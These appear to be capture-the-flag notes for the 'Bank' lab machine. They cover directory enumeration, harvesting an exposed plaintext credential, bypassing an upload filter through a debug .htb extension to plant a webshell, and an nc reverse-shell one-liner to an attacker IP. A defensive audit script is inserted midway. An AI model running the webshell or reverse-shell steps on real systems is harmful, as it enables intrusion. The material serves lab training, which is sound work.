3 :80

http://ns.bank.htb/
# Apache landing page

http://bank.htb
# http://bank.htb/login.php
# Login Page

$ gobuster dir -u http://bank.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 80 -x php,html,txt
===============================================================
2021/08/04 23:34:29 Starting gobuster in directory enumeration mode
===============================================================
/support.php          (Status: 302) [Size: 3291] [--> login.php]
/index.php            (Status: 302) [Size: 7322] [--> login.php]
/uploads              (Status: 301) [Size: 305] [--> http://bank.htb/uploads/]
/assets               (Status: 301) [Size: 304] [--> http://bank.htb/assets/]
/login.php            (Status: 200) [Size: 1974]
/logout.php           (Status: 302) [Size: 0] [--> index.php]
/inc                  (Status: 301) [Size: 301] [--> http://bank.htb/inc/]
/balance-transfer     (Status: 301) [Size: 314] [--> http://bank.htb/balance-transfer/]

http://bank.htb/balance-transfer/
# has tons of .acc files

# downloading all of them
$ wget -r http://bank.htb/balance-transfer/

# example of one file
++OK ENCRYPT SUCCESS
+=================+
| HTB Bank Report |
+=================+

===UserAccount===
Full Name: czeCv3jWYYljNI2mTedDWxNCF37ddRuqrJ2WNlTLje47X7tRlHvifiVUm27AUC0ll2i9ocUIqZPo6jfs0KLf3H9qJh0ET00f3josvjaWiZkpjARjkDyokIO3ZOITPI9T
Email: 1xlwRvs9vMzOmq8H3G5npUroI9iySrrTZNpQiS0OFzD20LK4rPsRJTfs3y1VZsPYffOy7PnMo0PoLzsdpU49OkCSSDOR6DPmSEUZtiMSiCg3bJgAElKsFmlxZ9p5MfrE
Password: TmEnErfX3w0fghQUCAniWIQWRf1DutioQWMvo2srytHOKxJn76G4Ow0GM2jgvCFmzrRXtkp2N6RyDAWLGCPv9PbVRvbn7RKGjBENW3PJaHiOhezYRpt0fEV797uhZfXi
CreditCards: 5
Transactions: 93
Balance: 905948 .
===UserAccount===

# need to find a file that does not contain `++OK ENCRYPT SUCCESS`

$ grep -L "++OK ENCRYPT SUCCESS" *.acc
68576f20e9732f1b2edc4df5b8533230.acc

$ cat 68576f20e9732f1b2edc4df5b8533230.acc
--ERR ENCRYPT FAILED
+=================+
| HTB Bank Report |
+=================+

===UserAccount===
Full Name: Christos Christopoulos
Email: chris@bank.htb
Password: !##HTBB4nkP4ssw0rd!##
CreditCards: 5
Transactions: 39
Balance: 8842803 .
===UserAccount===
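
Added example, not part of the original notes: the same check from the defender's side, as an audit of a report directory for records that were written without encryption. It goes one step past `grep -L` by also flagging files whose marker says success but whose Email field still contains `@`; that heuristic, the function names and the sample files are assumptions made for this example.

```shell
#!/bin/sh
# Audit .acc reports (format as shown above) for unencrypted records.
# Function names and sample data are hypothetical, constructed for this example.

# Print the status marker: the first non-empty line of a report.
acc_status() {
    awk 'NF { print; exit }' "$1"
}

# List reports that must be treated as exposed, one per line, with the reason:
#  - the marker is anything other than "++OK ENCRYPT SUCCESS" (or is missing)
#  - the marker says success but the Email field contains "@" (assumed
#    heuristic: the encrypted values shown above are purely alphanumeric)
audit_acc_dir() {
    for acc_f in "$1"/*.acc; do
        [ -e "$acc_f" ] || continue
        acc_s=$(acc_status "$acc_f")
        if [ "$acc_s" != "++OK ENCRYPT SUCCESS" ]; then
            printf '%s\tstatus=%s\n' "${acc_f##*/}" "${acc_s:-<empty>}"
        elif grep -q '^Email: .*@' "$acc_f"; then
            printf '%s\tplaintext-email\n' "${acc_f##*/}"
        fi
    done
}

# Write four constructed sample reports into directory $1.
make_samples() {
    printf '%s\n' '++OK ENCRYPT SUCCESS' '===UserAccount===' \
        'Email: 1xlwRvs9vMzOmq8H' '===UserAccount===' > "$1/ok.acc"
    printf '%s\n' '--ERR ENCRYPT FAILED' '===UserAccount===' \
        'Email: user@example.test' '===UserAccount===' > "$1/failed.acc"
    printf '%s\n' '++OK ENCRYPT SUCCESS' '===UserAccount===' \
        'Email: other@example.test' '===UserAccount===' > "$1/mismarked.acc"
    : > "$1/empty.acc"
}

# Demo on the constructed samples.
demo_dir=$(mktemp -d)
make_samples "$demo_dir"
audit_acc_dir "$demo_dir"
rm -rf "$demo_dir"
```

Run against the real report directory on a schedule, any output line is a record that should be pulled from the web root and its credentials rotated.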

# using these creds on http://bank.htb works
http://bank.htb/index.php
# logged in as Christos Christopoulos

http://bank.htb/support.php
Form has upload file capability.
.php is not allowed; only images.

# generated webshell code in image
http://bank.htb/uploads/shell.gif
The image “http://bank.htb/uploads/shell.gif” cannot be displayed because it contains errors

# the server is reading the file as image data and php code is not executing.

# after wasting a lot of time
# source code contains
<!-- [DEBUG] I added the file extension .htb to execute as php for debugging purposes only [DEBUG] 

# created webshell as web.htb
# successfully uploaded

http://bank.htb/uploads/web.htb
# works

# rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 10.10.16.161 6969 >/tmp/f
$ nc -lvnp 6969
listening on [any] 6969 ...
connect to [10.10.16.161] from (UNKNOWN) [10.10.10.29] 56888
bash: cannot set terminal process group (1075): Inappropriate ioctl for device
bash: no job control in this shell
www-data@bank:/var/www/bank/uploads$ whoami;id;hostname
whoami;id;hostname
www-data
uid=33(www-data) gid=33(www-data) groups=33(www-data)
bank
www-data@bank:/var/www/bank/uploads$
